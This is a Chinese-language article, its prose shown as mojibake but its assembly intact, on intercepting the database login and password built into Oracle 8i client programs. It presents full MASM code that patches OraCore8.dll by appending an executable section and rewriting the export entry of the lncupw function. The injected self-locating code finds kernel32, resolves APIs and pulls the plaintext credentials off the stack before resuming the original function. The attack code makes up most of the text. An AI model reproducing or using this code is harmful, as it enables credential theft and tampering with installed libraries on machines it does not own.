´ó²¿·ÖµÄ·þÎñÆ÷/¿Í»§¶ËϵͳµÄ½á¹¹¿ÉÒÔÕâÑùÃèÊö£º
¿Í»§¶Ë <---(1)---> ϵͳTCP/IPÄ£¿é <---(2)---> ÍøÂç <----> ϵͳµÄTCP/IPÄ£¿é <----> ·þÎñ¶Ë
¶ÔÓÚÕâЩϵͳ£¬Ò»°ãµÄ°²È«ÎÊÌâ³öÔÚÓÉ(2)ËùʾµÄµØ·½£¬±ÈÈç˵µ±Ê¹Óà POP3 ÐÒéÊÕÈ¡Óʼþ£¬»òÕßÓà Telnet µÇ¼µ½Ô¶³ÌÖ÷»úµÄʱºò£¬ÆäµÇ¼ÃÜÂ붼ÊÇδ¾¼ÓÃܵģ¬Ö»ÒªÔÚÍøÂçÉÏ°²×°Ò»¸öÐá̽Æ÷ (Sniffer) À´¼àÌýÊý¾Ý°ü£¬¾Í¿ÉÒÔºÜÈÝÒ׵ؽػñÓû§ÃûºÍÃÜÂë¡£
µ«¶ÔÓÚ Oracle ϵͳÀ´Ëµ£¬Óû§ÃûºÍÃÜÂëÔÚÍøÂçÉÏ´«µÝ֮ǰ£¬ÊǾ¹ý¼ÓÃܵģ¬¶øÇÒ¼ÓÃܵÄËã·¨ÊDz»¿ÉÄæµÄ£¬¼´Ê¹Ê¹ÓÃÐá̽Æ÷̽Ìýµ½Êý¾Ý°ü£¬¿ªÊ¼ÎÞ·¨°ÑÊý¾Ý¿âµÄÁ¬½ÓÃÜÂë»Ö¸´³öÀ´£¬Oracle ϵͳµÄ½á¹¹¿ÉÒÔÈçÏÂÃèÊö£º
¿Í»§¶ËÓ¦ÓóÌÐò <--(1)--> Oracle¿Í»§¶ËÈí¼þ <---(2)---> ϵͳTCP/IPÄ£¿é <---(3)---> ÍøÂç <--> ϵͳµÄTCP/IPÄ£¿é <---> OracleÊý¾Ý¿â
¶ÔÓÚÕâÒ»Ààϵͳ£¬ËùÓÐÔÚ(2)»òÕß(3)´¦¼àÌýµ½µÄµÇ¼Êý¾Ý°ü¶¼ÊÇÒѾ¾¹ý¼ÓÃܵģ¬µ«ÊÇ£¬¿¼ÂÇÒ»ÏÂÎÒÃDZàд Oracle Êý¾Ý¿âÓ¦ÓóÌÐòµÄʱºò£¬ÎÞÂÛÊÇͨ¹ý ODBC »¹ÊÇ Pro C£¬»òÕßÆäËûµÄ BDE »·¾³µÈ£¬¶¼Êǽ«Êý¾Ý¿âÁ¬½ÓµÄÓû§ÃûºÍÃÜÂëÓÃÃ÷Îĵķ½Ê½´«µÝ¸ø Oracle ¿Í»§¶ËÇý¶¯³ÌÐòµÄ£¬ËùÒÔÔÚ(1)λÖõÄÊý¾ÝÁ÷¿Ï¶¨Ã÷Îĵģ¬ÃÜÂëÊÇÔÚ Oracle ¿Í»§¶ËÈí¼þÖб»¼ÓÃܺó²Å¾¹ý(2)¡¢(3)µÈ²½Öè·¢ËͳöÈ¥£¬Èç¹ûÔÚ(1)µÄλÖýøÐÐÀ¹½Ø£¬¾Í¿ÉÄÜÀ¹½Øµ½ÃÜÂë¡£
¿¼Âǵ½²½Öè(1)·¢ÉúÔÚÓ¦ÓóÌÐòµ½ Oracle ϵͳµÄµ÷ÓÃÖУ¬Ò²¾ÍÊÇ·¢ÉúÔÚ API µ÷ÓõIJã´Î£¬ËùÒÔÖ»ÒªÕÒµ½ÃÜÂë¼ÓÃÜÄ£¿éµÄÈë¿Ú£¬ÔÚ¶ÔÏàÓ¦µÄ API ½øÐÐ Hook£¬¾ÍÄܽػñµ½ÃÜÂëÁË¡£
ÓÐÈË¿ÉÄÜ´æÔÚÒ»¸öÒÉÎÊ£ºÊ¹Óà Sniffer ¿ÉÒÔ¼àÌýµ½ÍøÂçÉÏÆäËû¼ÆËã»úµÄÁ¬½ÓÊý¾Ý°ü£¬¶øÔÚ API ²ã´ÎÉϽøÐÐÀ¹½ØÊÇÕë¶Ô±¾»úµÄ£¬µ«ÒªÊÇ×Ô¼ºÄܹ»ÔÚ±¾»úÉÏÁ¬½Ó£¬¾Í±íʾÒѾ֪µÀÃÜÂëÁË£¬ÔÙÈ¥½Ø»ñ²»ÊǶà´ËÒ»¾ÙÂð£¿
·ÇÒ²£¡
ʵ¼ÊÉÏ´ó²¿·ÖµÄ Oracle Ó¦ÓóÌÐò¶¼°üÀ¨Ò»¸öÓû§¿ª·¢µÄ¿Í»§¶Ë£¬Õâ¸ö¿Í»§¶Ë¿ÉÄÜÊÇÓà C¡¢PowerBuilder ºÍÆäËûÓïÑÔ¿ª·¢µÄ£¬ÕâЩÈí¼þÌṩһ¸ö½çÃæÌáʾÓû§ÊäÈëÓû§ÃûºÍÃÜÂëµÇ¼ϵͳ£¬µ«ÊÇÕâ¸öÓû§ÃûºÍÃÜÂë²¢²»ÊÇÊý¾Ý¿âµÄÁ¬½ÓÓû§ÃûºÍÃÜÂ룬¶ø½ö½öÊÇÒ»¸öÀàËÆÓÚ users ±íÖеÄÒ»Ìõ¼Ç¼¶øÒÑ£¬¶ø³ÌÐòÄÚ²¿ÄÚÖõÄÊý¾Ý¿âÁ¬½ÓÕʺŲÅÊÇÎÒÃǵÄÄ¿±ê£¬Ò»°ãÀ´Ëµ£¬¿Í»§¶ËÓ¦ÓóÌÐòÊÇÕâÑù¹¤×÷µÄ£º
1. ʹÓÃÒ»¸öÄÚÖõÄÊý¾Ý¿âÁ¬½ÓÕʺÅÁ¬½Óµ½Êý¾Ý¿â¡£
2. µ¯³öÒ»¸ö¶Ô»°¿òÌáʾÓû§ÊäÈëÓû§Ãû xxx ºÍÃÜÂë yyy
3. ʹÓÃÀàËÆÓÚ select * from users where username='xxx' and password='yyy' Ò»ÀàµÄ SQL Óï¾ä²éѯÓû§ÊÇ·ñÓÐȨµÇ¼ϵͳ¡£
ÎÒÃǵÄÄ¿±ê¾ÍÊDz½Öè1ÖеÄÁ¬½ÓÕʺţ¬Õâ¸öÕʺŴæÔÚÓÚ¿Í»§¶ËÈí¼þÖУ¬ËäÈ»¿ÉÄÜÒѾ±»¾²Ì¬¼ÓÃÜ£¨Ò²¾ÍÊÇ˵ÓÃ16½øÖÆÈí¼þÈ¥ËÑÑ°¿ÉÖ´ÐÐÎļþʱ²¢²»Äܱ»ÕÒµ½£©£¬µ«ËüÔËÐкóÐèÒªÁ¬½ÓÊý¾Ý¿âµÄʱºò±ØÈ»»á±»½âÃܲ¢ÓÃÃ÷ÎÄ´«µÝµ½ Oracle ¿Í»§¶ËÈí¼þÖС£
·½·¨
ºÃÁË£¬ÏÖÔÚÀ´¿´¿´¾ßÌåµÄʵÏÖ·½·¨¡£
1. Ïà¹ØµÄµ÷ÓÃ
µÚÒ»²½µ±È»ÒªÖªµÀÔÚÄÄÀïÏÂÊÖ£¬¾¹ýÁËÒ»·¬¸ú×ÙÒÔºó£¨ÕâÀïÊ¡È¥¸ú×ٵIJ½Öè n ²½£¬´ó¼Ò¿ÉÒÔ³¢ÊÔ×Ô¼º¸ú×Ùһϣ©£¬¾Í¿ÉÒÔ·¢ÏÖÓû§ÃûºÍÃÜÂëÊÇÔÚ OraCore8.dll Ä£¿éÖÐµÄ lncupw º¯ÊýÖб»¼ÓÃܵģ¬¶øÇÒÕâ¸öº¯ÊýµÄµ÷Ó÷½·¨ÈçÏ£º
invoke lncupw,addr Output,1eh,addr szPassword,dwLenPass,addr szUserName,dwLenName,NULL,1
º¯ÊýµÄÈë¿Ú²ÎÊý°üÀ¨Ã÷ÎĵÄÊý¾Ý¿âÁ¬½ÓÓû§ÃûºÍÃÜÂ룬ÒÔ¼°ËûÃǵij¤¶È£¬ÔËÐеĽá¹ûÊÇÔÚµÚÒ»¸ö²ÎÊýOutputÖ¸¶¨µÄ»º³åÇøÖзµ»Ø¼ÓÃܺóµÄÊý¾Ý£¬ÒÔºóÕâ¸ö¼ÓÃܺóµÄÊý¾Ý»á±»·¢Ë͵½·þÎñÆ÷¶Ë½øÐÐÈÏÖ¤¡£
2. ¾ßÌåµÄʵÏÖ·½°¸
ÎÒÃǵķ½·¨¾ÍÊÇÔÚ¶Ô OraCore8.dll ½øÐв¹¶¡£¬ÔÚ dll ÎļþÖи½¼ÓÒ»¶Î´úÂ룬ȻºóÐÞ¸Ä dll µÄµ¼³ö±íÖÐ lncupw º¯Êý¶ÔÓ¦µÄÈë¿ÚµØÖ·£¬½«ËüÖ¸Ïòµ½¸½¼ÓµÄ´úÂëÖУ¬È»ºóÓÉÕâ¶Î´úÂëÔÚ¶ÑÕ»ÖÐÈ¡³öÓû§ÃûºÍÃÜÂë²¢ÏÔʾ³öÀ´£¬Íê³ÉÕâ¸ö²½ÖèºóÔÙÌøתµ½ÔʼµÄ lncupw º¯ÊýµÄÈë¿ÚµØÖ·È¥Ö´ÐÐÔÓеŦÄÜ¡£
Õâ¸ö·½°¸Éæ¼°µ½Á½¸ö¼¼ÊõÎÊÌ⣬µÚÒ»ÊÇ¶Ô dll ÎļþµÄÐÞ¸ÄÎÊÌ⣬Õâ¸öÎÊÌâ¿ÉÒÔ¹é½áΪÔÚ PE ÎļþºóÌí¼Ó¿ÉÖ´ÐдúÂëµÄ·½·¨ÎÊÌ⣬µÚ¶þ¾ÍÊÇд±»¸½¼Óµ½ dll ÎļþºóµÄ³ÌÐòÌåµÄÎÊÌâ¡£
¶Ô dll ÎļþµÄÐ޸ĴúÂëµÄƬ¶ÏÈçÏ£¬ÔÚÕâÒÔÇ°£¬ÎÒÃǼٶ¨ÒѾ×öÁËÆäËûÕâÑùһЩ¹¤×÷£º
¡ù ÎļþÃû×Ö·û´®·ÅÔÚ szFileName Ö¸¶¨µÄ»º³åÇøÖС£
¡ù ÒѾ¶ÔÎļþ½øÐÐУÑ飬ÕÒµ½Á˵¼³ö±íÖÐµÄ lncupw ÏîÄ¿£¬Õâ¸öÏîÄ¿ÔÚÎļþÖÐµÄ Offset ·ÅÔÚ dwOffsetPeHeand ÖУ¬lncupw µÄÔʼÈë¿ÚRVA·ÅÔÚ dwProcEntry ±äÁ¿ÖС£
¡ù ÕÒ³öÁË dll ÎļþÖÐµÄ PE ÎļþͷλÖ㬲¢¿½±´ PE ÎļþÍ·µ½ lpPeHead Ö¸¶¨µÄλÖÃÖС£
invoke CreateFile,addr szFileName,GENERIC_READ or GENERIC_WRITE,FILE_SHARE_READ or \
FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,NULL
.if eax == INVALID_HANDLE_VALUE
invoke MessageBox,hWinMain,addr szErrModify,NULL,MB_OK or MB_ICONERROR
jmp _Ret
.endif
mov @hFile,eax
;********************************************************************
; esi --> ÔPeHead
; edx --> ×îºóÒ»¸ö½Ú±í£¬ebx --> мӵĽڱí
;********************************************************************
mov esi,lpPeHead
assume esi:ptr IMAGE_NT_HEADERS
movzx eax,[esi].FileHeader.NumberOfSections
dec eax
mov ecx,sizeof IMAGE_SECTION_HEADER
mul ecx
mov edx,esi
add edx,eax
add edx,sizeof IMAGE_NT_HEADERS
mov ebx,edx
add ebx,sizeof IMAGE_SECTION_HEADER
assume ebx:ptr IMAGE_SECTION_HEADER,edx:ptr IMAGE_SECTION_HEADER
;********************************************************************
; ¼ÓÈëÒ»¸öеĽڣ¬²¢ÐÞÕýһЩPEÍ·²¿µÄÄÚÈÝ
;********************************************************************
inc [esi].FileHeader.NumberOfSections
mov eax,[edx].PointerToRawData
add eax,[edx].SizeOfRawData
mov [ebx].PointerToRawData,eax
invoke _Align,offset APPEND_CODE_END-offset APPEND_CODE,[esi].OptionalHeader.FileAlignment
mov [ebx].SizeOfRawData,eax
invoke _Align,offset APPEND_CODE_END-offset APPEND_CODE,[esi].OptionalHeader.SectionAlignment
add [esi].OptionalHeader.SizeOfCode,eax ;ÐÞÕýSizeOfCode
add [esi].OptionalHeader.SizeOfImage,eax ;ÐÞÕýSizeOfImage
invoke _Align,[edx].Misc.VirtualSize,[esi].OptionalHeader.SectionAlignment
add eax,[edx].VirtualAddress
mov [ebx].VirtualAddress,eax
mov [ebx].Misc.VirtualSize,offset APPEND_CODE_END-offset APPEND_CODE
mov [ebx].Characteristics,IMAGE_SCN_CNT_CODE\
or IMAGE_SCN_MEM_EXECUTE or IMAGE_SCN_MEM_READ or IMAGE_SCN_MEM_WRITE
invoke lstrcpy,addr [ebx].Name1,addr szMySection
;********************************************************************
; дÎļþ
;********************************************************************
invoke SetFilePointer,@hFile,dwOffsetPeHead,NULL,FILE_BEGIN
invoke WriteFile,@hFile,esi,[esi].OptionalHeader.SizeOfHeaders,\
addr @dwTemp,NULL
invoke SetFilePointer,@hFile,[ebx].PointerToRawData,NULL,FILE_BEGIN
invoke WriteFile,@hFile,offset APPEND_CODE,[ebx].Misc.VirtualSize,\
addr @dwTemp,NULL
mov eax,[ebx].PointerToRawData
add eax,[ebx].SizeOfRawData
invoke SetFilePointer,@hFile,eax,NULL,FILE_BEGIN
invoke SetEndOfFile,@hFile
;********************************************************************
; ÐÞÕýмӴúÂëÖÐµÄ Jmp oldEntry Ö¸Áî
;********************************************************************
mov eax,[ebx].VirtualAddress
add eax,(offset _dwOldEntry-offset APPEND_CODE+4)
sub dwProcEntry,eax
mov ecx,[ebx].PointerToRawData
add ecx,(offset _dwOldEntry-offset APPEND_CODE)
invoke SetFilePointer,@hFile,ecx,NULL,FILE_BEGIN
invoke WriteFile,@hFile,addr dwProcEntry,4,addr @dwTemp,NULL
;********************************************************************
; ÐÞÕýÈë¿ÚÖ¸Õë
;********************************************************************
mov eax,[ebx].VirtualAddress
add eax,(offset _NewEntry-offset APPEND_CODE)
mov dwProcEntry,eax
invoke SetFilePointer,@hFile,dwOffsetProc,NULL,FILE_BEGIN
invoke WriteFile,@hFile,addr dwProcEntry,4,addr @dwTemp,NULL
;********************************************************************
; ¹Ø±ÕÎļþ
;********************************************************************
invoke CloseHandle,@hFile
_Ret:
; ÐÞ¸ÄÍê³É
Õâ¶Î´úÂëÍê³ÉÁË3¸ö²½Ö裬Ê×ÏÈÊÇɨÃèPEÎļþÍ·ÖÐµÄ½Ú±í£¬²¢ÔÚ×îºóÌí¼ÓÒ»¸öеĽڣ¬ÒÔ±ã°Ñ¸½¼ÓµÄ´úÂëдµ½Õâ¸ö½ÚÖУ¬Õâ¸ö½ÚµÄÊôÐÔ±»ÉèÖÃΪ¿ÉÖ´ÐС¢¿É¶Á¡¢¿Éд£¬ÒòΪ´úÂëÔËÐÐÐèÒªµÄÊý¾ÝÇøÒ²·ÅÔÚÕâÀȻºó³ÌÐòÐ޸ĸ½¼Ó´úÂë×îºóµÄ jmp Ö¸Á½«ËüÖ¸µ½ÔʼµÄ lncupw º¯ÊýÖС£×îºó³ÌÐòÔÚ dll µÄµ¼³ö±íÖн« lncupw º¯ÊýµÄÈë¿ÚµØÖ·Ö¸Ïò¸½¼Ó´úÂëÖС£
ÏÂÃæÊDZ»¸½¼Óµ½ dll ºóµÄ´úÂ룬Õâ¶Î´úÂ뱻д³É¿ÉÒÔ×ÔÎÒ¶¨Î»µÄ¸ñʽ£¬´úÂëÊ×ÏÈÔÚÄÚ´æÖÐÕÒ³ö Kernel32.dll µÄλÖò¢´ÓÖÐÕÒ³ö LoadLibrary º¯ÊýºÍ GetProcAddress º¯ÊýµÄµØÖ·£¬È»ºóµ÷ÓÃÕâÁ½¸öº¯Êý»ñÈ¡ÆäËûһϵÁÐÒªÓõ½µÄº¯ÊýµÄÈë¿ÚµØÖ·£º
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Òª±»Ìí¼Óµ½ OraCore8.dll ÎļþºóÃæµÄÖ´ÐдúÂë
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;
;
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; һЩº¯ÊýµÄÔÐζ¨Òå
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_ProtoGetProcAddress typedef proto :dword,:dword
_ProtoLoadLibrary typedef proto :dword
_ProtoMessageBox typedef proto :dword,:dword,:dword,:dword
_Protowsprintf typedef proto c :dword,:VARARG
_ApiGetProcAddress typedef ptr _ProtoGetProcAddress
_ApiLoadLibrary typedef ptr _ProtoLoadLibrary
_ApiMessageBox typedef ptr _ProtoMessageBox
_Apiwsprintf typedef ptr _Protowsprintf
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;
;
APPEND_CODE equ this byte
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; ±»Ìí¼Óµ½Ä¿±êÎļþÖеĴúÂë´ÓÕâÀ↑ʼ
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
hDllKernel32 dd ?
hDllUser32 dd ?
_GetProcAddress _ApiGetProcAddress ?
_LoadLibrary _ApiLoadLibrary ?
_MessageBox _ApiMessageBox ?
_wsprintf _Apiwsprintf ?
szLoadLibrary db 'LoadLibraryA',0
szGetProcAddress db 'GetProcAddress',0
szUser32 db 'user32',0
szMessageBox db 'MessageBoxA',0
szwsprintf db 'wsprintfA',0
szCaption db 'Oracle 8i ÃÜÂë½ØÈ¡²¹¶¡',0
szFormatPwd db '½Ø»ñ Oracle Á¬½Ó£º',0dh,0ah,0dh,0ah
db 'Óû§Ãû£º%s',0dh,0ah
db 'ÃÜ Â룺%s',0
szTmpBuffer db 512 dup (?)
szUserName db 64 dup (?)
szPassWord db 64 dup (?)
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; ´íÎó Handler
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_SEHHandler proc _lpExceptionRecord,_lpSEH,_lpContext,_lpDispatcherContext
pushad
mov esi,_lpExceptionRecord
mov edi,_lpContext
assume esi:ptr EXCEPTION_RECORD,edi:ptr CONTEXT
mov eax,_lpSEH
push [eax + 0ch]
pop [edi].regEbp
push [eax + 8]
pop [edi].regEip
push eax
pop [edi].regEsp
assume esi:nothing,edi:nothing
popad
mov eax,ExceptionContinueExecution
ret
_SEHHandler endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; ÔÚÄÚ´æÖÐɨÃè Kernel32.dll µÄ»ùÖ·
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
szKernel32 db 'KERNEL32'
_GetKernelBase proc _dwKernelRet
local @dwReturn
pushad
mov @dwReturn,0
;********************************************************************
; Öض¨Î»
;********************************************************************
call @F
@@:
pop ebx
sub ebx,offset @B
;********************************************************************
; ´´½¨ÓÃÓÚ´íÎó´¦ÀíµÄ SEH ½á¹¹
;********************************************************************
assume fs:nothing
push ebp
lea eax,[ebx + offset _PageError]
push eax
lea eax,[ebx + offset _SEHHandler]
push eax
push fs:[0]
mov fs:[0],esp
;********************************************************************
; ²éÕÒ Kernel32.dll µÄ»ùµØÖ·
;********************************************************************
mov edi,_dwKernelRet
and edi,0ffff0000h
.while TRUE
.if word ptr [edi] == IMAGE_DOS_SIGNATURE
mov esi,edi
add esi,[esi+003ch]
.if word ptr [esi] == IMAGE_NT_SIGNATURE
assume esi:ptr IMAGE_NT_HEADERS
mov esi,[esi].OptionalHeader.DataDirectory.VirtualAddress
add esi,edi
assume esi:ptr IMAGE_EXPORT_DIRECTORY
mov esi,[esi].nName
add esi,edi
mov ecx,sizeof szKernel32
push edi
lea edi,[ebx+szKernel32]
cld
repz cmpsb
pop edi
.if ZERO?
mov @dwReturn,edi
.break
.endif
assume esi:nothing
.endif
.endif
_PageError:
sub edi,010000h
.break .if edi < 70000000h
.endw
pop fs:[0]
add esp,0ch
popad
mov eax,@dwReturn
ret
_GetKernelBase endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; ´ÓÄÚ´æÖÐÄ£¿éµÄµ¼³ö±íÖлñȡij¸ö API µÄÈë¿ÚµØÖ·
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_GetApi proc _hModule,_lpszApi
local @dwReturn,@dwStringLength
pushad
mov @dwReturn,0
;********************************************************************
; Öض¨Î»
;********************************************************************
call @F
@@:
pop ebx
sub ebx,offset @B
;********************************************************************
; ´´½¨ÓÃÓÚ´íÎó´¦ÀíµÄ SEH ½á¹¹
;********************************************************************
assume fs:nothing
push ebp
lea eax,[ebx + offset _Error]
push eax
lea eax,[ebx + offset _SEHHandler]
push eax
push fs:[0]
mov fs:[0],esp
;********************************************************************
; ¼ÆËã API ×Ö·û´®µÄ³¤¶È£¨´øβ²¿µÄ0£©
;********************************************************************
mov edi,_lpszApi
mov ecx,-1
xor al,al
cld
repnz scasb
mov ecx,edi
sub ecx,_lpszApi
mov @dwStringLength,ecx
;********************************************************************
; ´Ó PE ÎļþÍ·µÄÊý¾ÝĿ¼»ñÈ¡µ¼³ö±íµØÖ·
;********************************************************************
mov esi,_hModule
add esi,[esi + 3ch]
assume esi:ptr IMAGE_NT_HEADERS
mov esi,[esi].OptionalHeader.DataDirectory.VirtualAddress
add esi,_hModule
assume esi:ptr IMAGE_EXPORT_DIRECTORY
;********************************************************************
; ²éÕÒ·ûºÏÃû³ÆµÄµ¼³öº¯ÊýÃû
;********************************************************************
mov ebx,[esi].AddressOfNames
add ebx,_hModule
xor edx,edx
.repeat
push esi
mov edi,[ebx]
add edi,_hModule
mov esi,_lpszApi
mov ecx,@dwStringLength
repz cmpsb
.if ZERO?
pop esi
jmp @F
.endif
pop esi
add ebx,4
inc edx
.until edx >= [esi].NumberOfNames
jmp _Error
@@:
;********************************************************************
; APIÃû³ÆË÷Òý --> ÐòºÅË÷Òý --> µØÖ·Ë÷Òý
;********************************************************************
sub ebx,[esi].AddressOfNames
sub ebx,_hModule
shr ebx,1
add ebx,[esi].AddressOfNameOrdinals
add ebx,_hModule
movzx eax,word ptr [ebx]
shl eax,2
add eax,[esi].AddressOfFunctions
add eax,_hModule
;********************************************************************
; ´ÓµØÖ·±íµÃµ½µ¼³öº¯ÊýµØÖ·
;********************************************************************
mov eax,[eax]
add eax,_hModule
mov @dwReturn,eax
_Error:
pop fs:[0]
add esp,0ch
assume esi:nothing
popad
mov eax,@dwReturn
ret
_GetApi endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; еÄÈë¿ÚµØÖ·
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_NewEntry:
;********************************************************************
; Öض¨Î»²¢»ñȡһЩ API µÄÈë¿ÚµØÖ·
;********************************************************************
pushad
call @F
@@:
pop ebx
sub ebx,offset @B
;********************************************************************
.if dword ptr [ebx+_MessageBox]
jmp @F
.endif
;********************************************************************
invoke _GetKernelBase,7b000000h ;»ñÈ¡Kernel32.dll»ùÖ·
or eax,eax
jz _ToOldEntry
mov [ebx+hDllKernel32],eax ;»ñÈ¡GetProcAddressÈë¿Ú
lea eax,[ebx+szGetProcAddress]
invoke _GetApi,[ebx+hDllKernel32],eax
or eax,eax
jz _ToOldEntry
mov [ebx+_GetProcAddress],eax
lea eax,[ebx+szLoadLibrary] ;»ñÈ¡LoadLibraryÈë¿Ú
invoke [ebx+_GetProcAddress],[ebx+hDllKernel32],eax
or eax,eax
jz _ToOldEntry
mov [ebx+_LoadLibrary],eax
lea eax,[ebx+szUser32] ;»ñÈ¡User32.dll»ùÖ·
invoke [ebx+_LoadLibrary],eax
or eax,eax
jz _ToOldEntry
mov [ebx+hDllUser32],eax
lea eax,[ebx+szMessageBox] ;»ñÈ¡MessageBoxÈë¿Ú
invoke [ebx+_GetProcAddress],[ebx+hDllUser32],eax
mov [ebx+_MessageBox],eax
or eax,eax
jz _ToOldEntry
lea eax,[ebx+szwsprintf] ;»ñÈ¡MessageBoxÈë¿Ú
invoke [ebx+_GetProcAddress],[ebx+hDllUser32],eax
mov [ebx+_wsprintf],eax
or eax,eax
jz _ToOldEntry
;********************************************************************
; ³ÌÐò¹¦ÄÜ¿ªÊ¼
;********************************************************************
; lncupw µÄµ÷Ó÷½Ê½ÊÇ£º
; invoke lncupw,addr Output,1eh,addr szPassword,dwLenPass,addr szUserName,dwLenName,NULL,1
; ÏÖÔڵĶÑÕ»ÄÚÈÝÊÇ£º
; ...
; esp+14*4 dwLenUserName
; esp+13*4 addr szUserName
; esp+12*4 dwLenPass
; esp+11*4 addr szPassword
; esp+10*4 1eh
; esp+9*4 addr Output
; esp+8*4 call's return address
; esp+µ½esp+8*4 pusha ÍÆÈë¶ÑÕ»µÄ8¸ö¼Ä´æÆ÷Öµ
;
; ËùÒÔ£¬´Ó esp+13*4 ºÍ esp+11*4 È¡³öµÄ¾ÍÊÇ Oracle Ó¦ÓóÌÐò
; ´«µÝ½øÀ´µÄÓÃÀ´Á¬½ÓÊý¾Ý¿âµÄÓû§ÃûºÍÃÜÂëµØÖ·¡£
;********************************************************************
@@:
mov esi,[esp+13*4] ;username
lea edi,[ebx+szUserName]
mov ecx,[esp+14*4]
cmp ecx,60
jle @F
mov ecx,60
@@:
cld
rep movsb
xor eax,eax
stosb
mov esi,[esp+11*4] ;password
lea edi,[ebx+szPassWord]
mov ecx,[esp+12*4]
cmp ecx,60
jle @F
mov ecx,60
@@:
rep movsb
xor eax,eax
stosb
lea eax,[ebx+szUserName]
lea ecx,[ebx+szPassWord]
lea edx,[ebx+szFormatPwd]
lea esi,[ebx+szTmpBuffer]
invoke [ebx+_wsprintf],esi,edx,eax,ecx
lea ecx,[ebx+szTmpBuffer]
lea eax,[ebx+szCaption]
invoke [ebx+_MessageBox],NULL,ecx,eax,MB_OK or MB_ICONINFORMATION or MB_SERVICE_NOTIFICATION
;********************************************************************
; Ö´ÐÐÔÀ´µÄÎļþ
;********************************************************************
_ToOldEntry:
popad
db 0e9h ;0e9hÊÇjmp xxxxxxxxµÄ»úÆ÷Âë
_dwOldEntry:
dd ? ;ÓÃÀ´ÌîÈëÔÀ´µÄ lncupw º¯ÊýµÄÈë¿ÚµØÖ·
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
APPEND_CODE_END equ this byte
¶Ô OraCore8.dll ½øÐÐÁËÕâÑùµÄ²¹¶¡ÒԺ󣬷²ÊÇÓÐÓ¦ÓóÌÐòÁ¬½Ó Oracle Êý¾Ý¿â£¬¸½¼Ó´úÂë¾Í¿ÉÒԽػñµ½Á¬½ÓËùÓõÄÓû§ÃûºÍÃÜÂ벢ͨ¹ýÒ»¸ö MessageBox ÏÔʾ³öÀ´ÁË£¡
